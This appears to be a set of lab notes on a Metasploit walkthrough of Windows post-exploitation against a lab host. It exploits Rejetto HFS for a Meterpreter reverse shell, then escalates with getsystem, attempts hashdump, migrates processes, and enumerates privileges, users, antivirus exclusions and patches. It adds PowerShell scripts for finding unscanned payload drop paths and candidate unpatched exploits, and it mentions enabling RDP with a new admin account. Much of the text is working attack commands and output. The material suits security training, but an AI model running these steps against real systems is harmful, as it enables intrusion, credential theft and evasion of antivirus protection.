Windows Post Exploitation Modules
The Metasploit Framework (MSF) provides various post exploitation modules for both Windows and Linux.
We can utilize these post exploitation modules to enumerate information about the Windows system we currently have access to:
- Enumerate user privileges
- Enumerate logged on users
- VM check
- Enumerate installed programs
- Enumerate installed AV products and their exclusions
- Enumerate computers connected to domain
- Enumerate installed patches
- Enumerate shares
Demo: Windows Post Exploitation Modules
From our Meterpreter session we can enumerate the privileges of the user we are currently running as.
We can also enumerate the logged on users, which gives an idea of who is currently logged in and who has logged in recently.
We can enumerate the programs installed on the target, which helps during privilege escalation: a specific program or version may be vulnerable to a local privilege escalation attack.
We can enumerate the computers connected to the domain. If the target is part of a Windows domain, listing the other domain members helps with pivoting and with understanding what other systems are on the target network.
We can enumerate the installed patches or updates, which tells us which fixes are present and therefore which local exploits are still worth trying to elevate our privileges on this particular system.
Target IP Address: 10.2.23.169
service postgresql start && msfconsole
workspace -a windows_post
setg RHOSTS 10.2.23.169
db_nmap -sV 10.2.23.169
search rejetto
use exploit/windows/http/rejetto_hfs_exec
show options
run
The target operating system architecture is 64-bit and the Meterpreter architecture is 32-bit. So we can upgrade that.
meterpreter > sysinfo
Architecture : x64
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter > help
Manage Meterpreter and Shell Sessions
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
meterpreter > screenshot
Try to elevate our privileges. NT AUTHORITY\SYSTEM is the highest level of privilege on a Windows system.
meterpreter > getsystem
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We can also run the hashdump command to dump the local account hashes. In this case it failed with "The parameter is incorrect". Since we are already NT AUTHORITY\SYSTEM, access to the SAM is not the problem; a well-known cause of this particular error is an architecture mismatch, a 32-bit Meterpreter trying to read the SAM on a 64-bit host. The usual fix is to migrate into an x64 process first (as we do below) and retry, or to use the post/windows/gather/hashdump module instead.
meterpreter > hashdump
The show_mount command displays the mounts or drives attached to the system, together with their type: fixed, or removable, which typically indicates a USB flash drive or an external hard disk.
That is the process of enumerating the mounts and drives attached to the Windows target.
meterpreter > show_mount
List out the process tree.
meterpreter > ps
If we want to migrate to explorer.exe, we can utilize the process id or the name of the process.
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- -----
2212 2164 explorer.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\explorer.exe
I can migrate to PID 2212, which is a 64-bit process, so our Meterpreter session is upgraded to x64 as well. One caveat: explorer.exe runs as Administrator, not SYSTEM, and a migrated session takes on the security context of the process it lands in, so the SYSTEM token we obtained with getsystem is lost by this migration (the sessions listing afterwards shows the session as WIN-OMCNBKR66MN\Administrator). Run getsystem again after migrating if you need SYSTEM.
We now have a 64-bit Meterpreter session.
meterpreter > migrate 2212
meterpreter > sysinfo
Meterpreter : x64/windows
meterpreter > dir # ls
meterpreter > cd C:\\
meterpreter > dir
meterpreter > cat flag.txt
meterpreter > pwd # Print out our current working directory
meterpreter > download flag.txt
Background the session, because we want to run post exploitation modules from msfconsole.
meterpreter > sessions
Id Name Type Information Connection
--- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN-OMCNBKR66MN\Administrator @ WIN-OMCNBKR66MN 10.10.5.2:4444 -> 10.2.23.169:49246 (10.2.23.169)
Let’s take a look at some of the post exploitation modules we can use.
First, if you ever need to change the architecture of the Meterpreter payload, there is a dedicated module for it (post/windows/manage/archmigrate, which appears in the search results below).
Architecture Migrate
This module checks whether the Meterpreter architecture matches the OS architecture and, if it does not, spawns a new process with the correct architecture and migrates into that process.
Windows Manage Process Migration
This module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.
In this case, with SPAWN left at its default of true, the module should create a new notepad.exe process and migrate into it.
Here it failed. The traceback points into the module's create_temp_proc, where the framework's process lookup crashes with a NoMethodError (downcase called on a nil process name while walking the process list). That is a bug in this build of the module, not a consequence of our earlier manual migration; the archmigrate module succeeds on the same session in the lab output below.
search migrate
use post/windows/manage/migrate
show options
set SESSION 1
run
sessions
sessions 1
meterpreter > background
Windows Gather Privileges Enumeration
This module will print if UAC is enabled, and if the current account is ADMIN enabled. It will also print UID, foreground SESSION ID, is SYSTEM status and current process PRIVILEGES.
This will enumerate the privileges of the current user that we have access to.
search win_privs
use post/windows/gather/win_privs
show options
set SESSION 1
run
Is System is False while Is Admin is True. We did obtain SYSTEM earlier with getsystem, but that technique (named pipe impersonation) only impersonates a SYSTEM token on the current Meterpreter thread. When we then migrated into explorer.exe, which runs as Administrator, the session took on that process's security context and the impersonated SYSTEM token was gone; that is why the module now reports the Administrator account (archmigrate said the same: "You're not running as SYSTEM"). Running getsystem again after a migration restores SYSTEM.
Is UAC enabled? True. With a local administrator account and UAC on, UAC bypass techniques become a relevant privilege escalation vector; Metasploit ships several of them as exploit/windows/local/bypassuac* modules.
The Windows Privileges list shows what the current token can do. Several of these are directly useful to an attacker: SeImpersonatePrivilege is what lets getsystem's named pipe technique work, SeDebugPrivilege allows opening and injecting into any process, including lsass.exe, and SeBackupPrivilege/SeRestorePrivilege allow reading and writing files regardless of their ACLs.
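The three facts the module reports (group membership, elevation, SYSTEM) and the privilege list can also be checked natively, which is useful when you only have a shell on the box or want to confirm what win_privs printed. The PowerShell below is an added example and is not part of the original page or of Metasploit; it runs on the target (for instance from a Meterpreter shell) and uses only built-in .NET classes, the registry and whoami. The function names and the watch-list of privileges are my choices, not an official list.

```powershell
# Added example: native equivalent of post/windows/gather/win_privs.
# Distinguishes "member of Administrators" from "running with an elevated
# token" from "running as SYSTEM", the three columns the module prints.

function Get-TokenContext {
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    $adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

    # IsInRole(Administrator) is only true for an elevated token. A member of
    # Administrators running under UAC's filtered token gets $false here.
    $elevated = $principal.IsInRole($adminRole)

    # Group membership regardless of elevation. S-1-5-32-544 = BUILTIN\Administrators.
    $inAdminGroup = [bool]($identity.Groups | Where-Object { $_.Value -eq 'S-1-5-32-544' })

    # S-1-5-18 = NT AUTHORITY\SYSTEM, the account getsystem impersonates.
    $isSystem = ($identity.User.Value -eq 'S-1-5-18')

    # UAC state: EnableLUA = 1 means UAC is on.
    $policy = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $uacOn  = ($policy.EnableLUA -eq 1)

    [pscustomobject]@{
        User         = $identity.Name
        IsSystem     = $isSystem
        InAdminGroup = $inAdminGroup
        Elevated     = $elevated
        UACEnabled   = $uacOn
    }
}

function Get-AbusablePrivileges {
    # Privileges worth noticing for escalation. This selection is mine.
    $watch = @(
        'SeImpersonatePrivilege',        # required by getsystem's named pipe impersonation
        'SeAssignPrimaryTokenPrivilege',
        'SeDebugPrivilege',              # open and inject into any process, e.g. lsass.exe
        'SeBackupPrivilege',             # read any file regardless of ACL (SAM/SYSTEM hives)
        'SeRestorePrivilege',            # write any file regardless of ACL
        'SeTakeOwnershipPrivilege',
        'SeLoadDriverPrivilege'
    )
    # whoami /priv lists every privilege held by the token and whether it is
    # currently Enabled or Disabled; CSV output makes it easy to filter.
    whoami /priv /fo csv | ConvertFrom-Csv |
        Where-Object { $watch -contains $_.'Privilege Name' } |
        Select-Object 'Privilege Name', State
}

Get-TokenContext | Format-List
Get-AbusablePrivileges | Format-Table -AutoSize
```

The State column matters: a privilege that is present but Disabled still counts as held (the process can enable it), which is why the module lists SeDebugPrivilege and friends even when a plain cmd.exe would show them disabled.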
Check what users are currently logged on.
Windows Gather Logged On User Enumeration (Registry)
This module will enumerate current and recently logged on Windows users.
This tells us whether any users are currently logged on and lists previously logged on users, which shows who uses the system regularly and who is on it right now. That gives us a heads-up on whether someone is likely to be watching and notice our activity.
search enum_logged_on
use post/windows/gather/enum_logged_on_users
show options
set SESSION 1
run
The currently logged on user is Administrator. Apart from Administrator, the recently logged on entries are S-1-5-18, S-1-5-19 and S-1-5-20, the built-in SYSTEM, LocalService and NetworkService profiles, which exist on every Windows machine and do not indicate an interactive user. So nobody else appears to use this box, which is good from an attacker's perspective: the last thing you want is someone detecting your activity and terminating your access.
The checkvm module tells you whether the target system is a virtual machine.
checkvm
The checkvm post module, simply enough, checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.
This information matters for a few reasons: it tells you the hypervisor and often the hosting environment (cloud or lab), and a VM may be a sandbox or analysis system rather than a real workstation. Escaping from a guest to the hypervisor requires a hypervisor vulnerability and is not something to expect from a stock Metasploit module; the practical value of this check is context, not a breakout path.
search checkvm
use post/windows/gather/checkvm
show options
set SESSION 1
run
So we’ve been able to enumerate the user privileges, we’ve also been able to get an idea of the currently logged on users, and we have also been able to get an idea of whether the target is indeed a virtual machine.
How to enumerate the installed programs on the target.
enum_applications
The enum_applications module enumerates the applications that are installed on the compromised host.
This tells us what programs are installed on the target system.
These are the installed programs and their versions, which matters because a vulnerable version of a third-party program may offer a privilege escalation path: if, say, a privilege escalation vulnerability existed in the installed Mozilla Firefox 80.0.1, we could use it. Here the only third-party application is Mozilla Firefox; the remaining entries are AWS drivers and agents (consistent with the amazon-ssm-agent.exe and Ec2Config.exe processes in the process list), which tells us this virtual machine is running in an AWS cloud environment.
search enum_applications
use post/windows/gather/enum_applications
show options
set SESSION 1
run
Whenever a post module saves results, they are written under ~/.msf4/loot/ (the enum_logged_on_users output below shows such a path), and the loot command lists these files with their locations. If you created a workspace and started the PostgreSQL database, the loot records are also stored in the MSF database and tied to that workspace, so loot shows them whenever you switch to it.
loot
If you browse to the loot directory in a file manager, enable View->Show Hidden (.msf4 is a hidden directory) and switch to list view to see the files.
Check what antivirus software or rather what antivirus solutions are installed on the target system, as well as enumerate the excluded folders that have been specified within the antivirus system. So we can get an idea of what folders are not being scanned by the antivirus solutions installed.
Windows Antivirus Exclusions Enumeration
This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.
Windows Defender is the built-in antivirus on current Windows versions (Windows 10 and Windows Server 2016 and later; Server 2012 R2, like this target, has no built-in Defender). Any excluded folder is not scanned, so such directories are good places to drop exploit code or payloads that we need to transfer to the target and execute on disk.
The module enumerates the exclusions for all of the listed antivirus products.
search type:post platform:windows enum_av
use post/windows/gather/enum_av_excluded
show options
set SESSION 1
run
So in this case, no excluded folders or extensions have been set, which means the entire file system is being scanned and monitored by the antivirus solution.
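The Defender exclusions the module reads live in the registry, so they can be enumerated natively and, more usefully, a planned drop path can be tested against them before you write a payload to disk. The PowerShell below is an added example and is not from the page or from Metasploit. It assumes Microsoft Defender is the product present (the module also covers Security Essentials and Symantec, which this code does not), and that you run it as an administrator, since recent Defender builds no longer let non-admins read the Exclusions keys. The function names and the sample path are mine.

```powershell
# Added example: enumerate Microsoft Defender exclusions from the registry and
# check whether a planned payload path falls inside one (a companion to
# post/windows/gather/enum_av_excluded, not the module's own code).

function Get-DefenderExclusions {
    $base   = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions'
    $result = @{}
    foreach ($kind in 'Paths', 'Extensions', 'Processes') {
        $key     = Join-Path $base $kind
        $entries = @()
        if (Test-Path $key) {
            # Each exclusion is stored as a value *name* under the key (its data is
            # a DWORD 0), so the list of value names is the list of exclusions.
            $entries = @((Get-Item $key).GetValueNames())
        }
        $result[$kind] = $entries
    }
    # Group Policy-managed path exclusions live under a separate key and also apply.
    $gpoPaths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'
    if (Test-Path $gpoPaths) {
        $result['Paths'] += @((Get-Item $gpoPaths).GetValueNames())
    }
    $result
}

function Test-DropPath {
    param([Parameter(Mandatory)][string]$Path)
    $ex = Get-DefenderExclusions

    # A path exclusion covers the path itself and everything below it. Compare
    # case-insensitively and normalise trailing backslashes so "C:\Tools" and
    # "C:\Tools\" behave the same. Wildcards in exclusions are not expanded here.
    $norm    = $Path.TrimEnd('\')
    $pathHit = $ex.Paths | Where-Object {
        $p = $_.TrimEnd('\')
        $norm.Equals($p, [System.StringComparison]::OrdinalIgnoreCase) -or
        $norm.StartsWith($p + '\', [System.StringComparison]::OrdinalIgnoreCase)
    }

    # Extension exclusions may be stored with or without the leading dot.
    $ext    = [System.IO.Path]::GetExtension($Path).TrimStart('.')
    $extHit = $ex.Extensions | Where-Object { $ext -ne '' -and $_.TrimStart('.') -ieq $ext }

    [pscustomobject]@{
        Path           = $Path
        ExcludedByPath = [bool]$pathHit
        MatchingPath   = ($pathHit -join ';')
        ExcludedByExt  = [bool]$extHit
        AnyExclusion   = [bool]($pathHit -or $extHit)
    }
}

Get-DefenderExclusions
# Constructed sample path: would a payload written here be scanned?
Test-DropPath -Path 'C:\Users\Public\payload.exe'
```

On a host like this one, with no exclusions configured, Test-DropPath reports AnyExclusion False for every path, which is the same conclusion the module reached above: nothing on disk escapes scanning, so an on-disk payload needs to evade the engine rather than hide from it.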
Let’s take a look at the ability to enumerate the computers that are part of the domain.
Windows Gather Active Directory Computers
This module will enumerate computers in the default AD directory.
search enum_computers
use post/windows/gather/enum_computers
show options
set SESSION 1
run
The host reports Domain: WORKGROUP in sysinfo, so it is not domain-joined and this module has no domain computers to return. What we know so far: a standalone Windows Server 2012 R2 virtual machine running in AWS.
How to enumerate the installed patches, which is very important during privilege escalation.
Windows Gather Applied Patches
This module enumerates patches applied to a Windows system using the WMI query: SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering.
This enumerates the patches applied on the target system.
KB: a comma separated list of KB patches to search for. Use it when you want to know whether a specific patch is installed, for example one that fixes the vulnerability you intend to exploit.
search enum_patches
use post/windows/gather/enum_patches
show options
set SESSION 1
run
Known bug in WMI query, try migrating to another process.
sessions
sessions 1
List out the current process tree.
meterpreter > ps
We can try and migrate to another process.
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- -----
896 660 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
meterpreter > migrate 896
meterpreter > background
run
If the module still fails, we can get the same information manually by interacting with the session.
Open a shell from the session, which gives us a command prompt, and run systeminfo. This native Windows command prints the installed hotfixes along with the OS version and build.
So if a post exploitation module fails on you, you can always fall back to manual enumeration.
sessions 1
meterpreter > shell
C:\Windows\system32>systeminfo
C:\Windows\system32>^C # Terminate this channel.
meterpreter > background # Put our Meterpreter session in the background.
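When enum_patches hits the WMI bug, or when you want to check specific KBs without the module, the same query can be issued natively and cross-checked against systeminfo. The PowerShell below is an added example, not code from the page or from Metasploit; the function names are mine, and the KB identifiers passed at the bottom are placeholders to replace with the fixes for whichever local exploit you are considering.

```powershell
# Added example: native equivalent of post/windows/gather/enum_patches,
# including the KB option's "is this patch present?" check and a
# systeminfo fallback for when the WMI query misbehaves.

function Get-InstalledKB {
    # Primary source: the same class the module queries
    # (SELECT HotFixID, InstalledOn FROM Win32_QuickFixEngineering).
    $qfe = Get-CimInstance -ClassName Win32_QuickFixEngineering -ErrorAction SilentlyContinue
    if ($qfe) {
        $ids = $qfe | ForEach-Object { $_.HotFixID }
        return $ids
    }
    # Fallback: systeminfo prints the hotfix list as "[01]: KBnnnnnnn" lines,
    # so pull every KB token out of its output.
    $lines = systeminfo
    $found = ($lines | Select-String -Pattern 'KB\d+' -AllMatches).Matches |
        ForEach-Object { $_.Value } | Sort-Object -Unique
    return $found
}

function Test-KBInstalled {
    param([Parameter(Mandatory)][string[]]$KB)
    $installed = @(Get-InstalledKB)
    foreach ($id in $KB) {
        [pscustomobject]@{
            KB        = $id
            Installed = ($installed -contains $id)
        }
    }
}

function Get-OSBuild {
    # Win32_QuickFixEngineering does not list every update (cumulative updates on
    # newer Windows often do not appear), so always record the build as well and
    # compare it against the build in which the fix you care about shipped.
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    [pscustomobject]@{
        Caption = $os.Caption
        Version = $os.Version
        Build   = $os.BuildNumber
    }
}

Get-OSBuild
Get-InstalledKB | Sort-Object
# Placeholder KB identifiers; substitute the ones relevant to your candidate exploit.
Test-KBInstalled -KB 'KB1111111', 'KB2222222'
```

A KB reported as not installed is a hint, not proof of exploitability: the fix may have arrived inside a later cumulative update that the QFE class does not list, which is why the build number is collected alongside.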
The enum_shares module allows us to enumerate shares.
enum_shares
The enum_shares post module returns a listing of both configured and recently used shares on the compromised system.
The print$ share is used to share printer drivers. Resource sharing on Windows is done over SMB.
search enum_shares
use post/windows/gather/enum_shares
show options
set SESSION 1
run
Next, the ability to check whether RDP is enabled. RDP, the Remote Desktop Protocol, is used to remotely access a Windows system with a graphical user interface instead of a terminal.
Windows Manage Enable Remote Desktop
This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target’s port 3389/tcp.
This module allows you to enable RDP on the target, after which we could establish an RDP session with it. As mentioned, RDP is explored in the Windows exploitation section; once we have covered privilege escalation and persistence, we will look at how to enable RDP and access the target over it.
search rdp platform:windows
use post/windows/manage/enable_rdp
show options
set SESSION 1
run
Windows Post Exploitation Modules
Overview
Goal
This lab covers the process of automating various phases of post-exploitation through the use of various Metasploit modules.
Target IP Address : 10.0.29.158
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > workspace -a windows_post
[*] Added workspace: windows_post
[*] Workspace: windows_post
msf5 > setg RHOSTS 10.0.29.158
RHOSTS => 10.0.29.158
msf5 > db_nmap -sV 10.0.29.158
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-12 17:04 IST
[*] Nmap: Nmap scan report for 10.0.29.158
[*] Nmap: Host is up (0.0027s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http HttpFileServer httpd 2.3
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49165/tcp open msrpc Microsoft Windows RPC
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 76.86 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.29.158 80 tcp http open HttpFileServer httpd 2.3
10.0.29.158 135 tcp msrpc open Microsoft Windows RPC
10.0.29.158 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.29.158 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.29.158 3389 tcp ssl/ms-wbt-server open
10.0.29.158 49152 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49153 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49154 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49155 tcp msrpc open Microsoft Windows RPC
10.0.29.158 49165 tcp msrpc open Microsoft Windows RPC
The HttpFileServer httpd 2.3 on port 80 is Rejetto HFS, for which Metasploit has a remote command execution exploit.
msf5 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.29.158 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.21.3:4444
[*] Using URL: http://0.0.0.0:8080/P431TWLBjtvhm
[*] Local IP: http://10.10.21.3:8080/P431TWLBjtvhm
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /P431TWLBjtvhm
[*] Sending stage (180291 bytes) to 10.0.29.158
[*] Meterpreter session 1 opened (10.10.21.3:4444 -> 10.0.29.158:49428) at 2023-02-12 17:12:55 +0530
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\iOyMAAXCco.vbs' on the target
meterpreter >
[!] Tried to delete %TEMP%\iOyMAAXCco.vbs, unknown result
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter > help
meterpreter > screenshot
Screenshot saved to: /root/nzJJeaCT.jpeg
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > show_mount
Mounts / Drives
===============
Name Type Size (Total) Size (Free) Mapped to
---- ---- ------------ ----------- ---------
C:\ fixed 29.66 GiB 8.68 GiB
Total mounts/drives: 1
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
336 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
348 4 smss.exe x64 0
496 488 csrss.exe x64 0
560 552 csrss.exe x64 1
568 488 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
596 552 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
656 568 services.exe x64 0
664 568 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
720 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
748 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
792 656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
848 596 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
860 656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
908 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
932 656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1060 656 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1096 656 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1148 656 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\XenTools\LiteAgent.exe
1168 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1204 656 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1284 656 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1636 720 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
1648 720 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1984 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2000 2320 cmd.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Windows\SysWOW64\cmd.exe
2040 656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2124 2656 hfs.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\hfs\hfs.exe
2188 908 taskhostex.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\System32\taskhostex.exe
2224 656 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2236 2224 explorer.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\explorer.exe
2320 2596 oUeujjzFnDugeFt.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Users\ADMINI~1\AppData\Local\Temp\1\rad7EDFA.tmp\oUeujjzFnDugeFt.exe
2596 2124 wscript.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Windows\SysWOW64\wscript.exe
2656 2236 powershell.exe x86 1 WIN-OMCNBKR66MN\Administrator C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2676 2656 conhost.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\System32\conhost.exe
2944 2000 conhost.exe x64 1 WIN-OMCNBKR66MN\Administrator C:\Windows\System32\conhost.exe
meterpreter > migrate 2236
[*] Migrating from 2320 to 2236...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > dir
meterpreter > cd c:\\
meterpreter > dir
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2020-08-12 09:43:47 +0530 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-08-22 21:16:48 +0530 BOOTNXT
40777/rwxrwxrwx 0 dir 2013-08-22 20:18:41 +0530 Documents and Settings
40777/rwxrwxrwx 0 dir 2013-08-22 21:09:30 +0530 PerfLogs
40555/r-xr-xr-x 4096 dir 2013-08-22 19:06:16 +0530 Program Files
40777/rwxrwxrwx 4096 dir 2013-08-22 19:06:16 +0530 Program Files (x86)
40777/rwxrwxrwx 4096 dir 2013-08-22 19:06:16 +0530 ProgramData
40777/rwxrwxrwx 0 dir 2020-09-05 09:16:25 +0530 System Volume Information
40555/r-xr-xr-x 4096 dir 2013-08-22 19:06:16 +0530 Users
40777/rwxrwxrwx 24576 dir 2013-08-22 19:06:16 +0530 Windows
100444/r--r--r-- 398356 fil 2013-08-22 21:16:48 +0530 bootmgr
100666/rw-rw-rw- 32 fil 2020-09-14 12:21:58 +0530 flag.txt
40777/rwxrwxrwx 0 dir 2020-09-14 11:40:20 +0530 hfs
0000/--------- 219552576 fif 1976-12-15 21:06:32 +0530 pagefile.sys
meterpreter > download flag.txt
[*] Downloading: flag.txt -> flag.txt
[*] Downloaded 32.00 B of 32.00 B (100.0%): flag.txt -> flag.txt
[*] download : flag.txt -> flag.txt
meterpreter > cat flag.txt
f74c8347798f4082daf4b4570dba094a
meterpreter > pwd
c:\
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WIN-OMCNBKR66MN\Administrator @ WIN-OMCNBKR66MN 10.10.21.3:4444 -> 10.0.29.158:49428 (10.0.29.158)
msf5 exploit(windows/http/rejetto_hfs_exec) > search migrate
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/awstats_migrate_exec 2006-05-04 excellent Yes AWStats migrate Remote Command Execution
1 exploit/windows/http/hp_nnm_ovas 2008-04-02 good Yes HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
2 exploit/windows/local/ms13_053_schlamperei 2013-12-01 average Yes Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
3 post/windows/capture/keylog_recorder normal No Windows Capture Keystroke Recorder
4 post/windows/capture/lockout_keylogger normal No Windows Capture Winlogon Lockout Credential Keylogger
5 post/windows/gather/enum_services normal No Windows Gather Service Info Enumeration
6 post/windows/gather/local_admin_search_enum normal No Windows Gather Local Admin Search
7 post/windows/gather/memory_grep normal No Windows Gather Process Memory Grep
8 post/windows/manage/add_user_domain normal No Windows Manage Add User to the Domain and/or to a Domain Group
9 post/windows/manage/archmigrate normal No Architecture Migrate
10 post/windows/manage/migrate normal No Windows Manage Process Migration
11 post/windows/manage/mssql_local_auth_bypass normal No Windows Manage Local Microsoft SQL Server Authorization Bypass
12 post/windows/manage/priv_migrate normal No Windows Manage Privilege Based Process Migration
msf5 exploit(windows/http/rejetto_hfs_exec) > use post/windows/manage/migrate
msf5 post(windows/manage/migrate) > show options
Module options (post/windows/manage/migrate):
Name Current Setting Required Description
---- --------------- -------- -----------
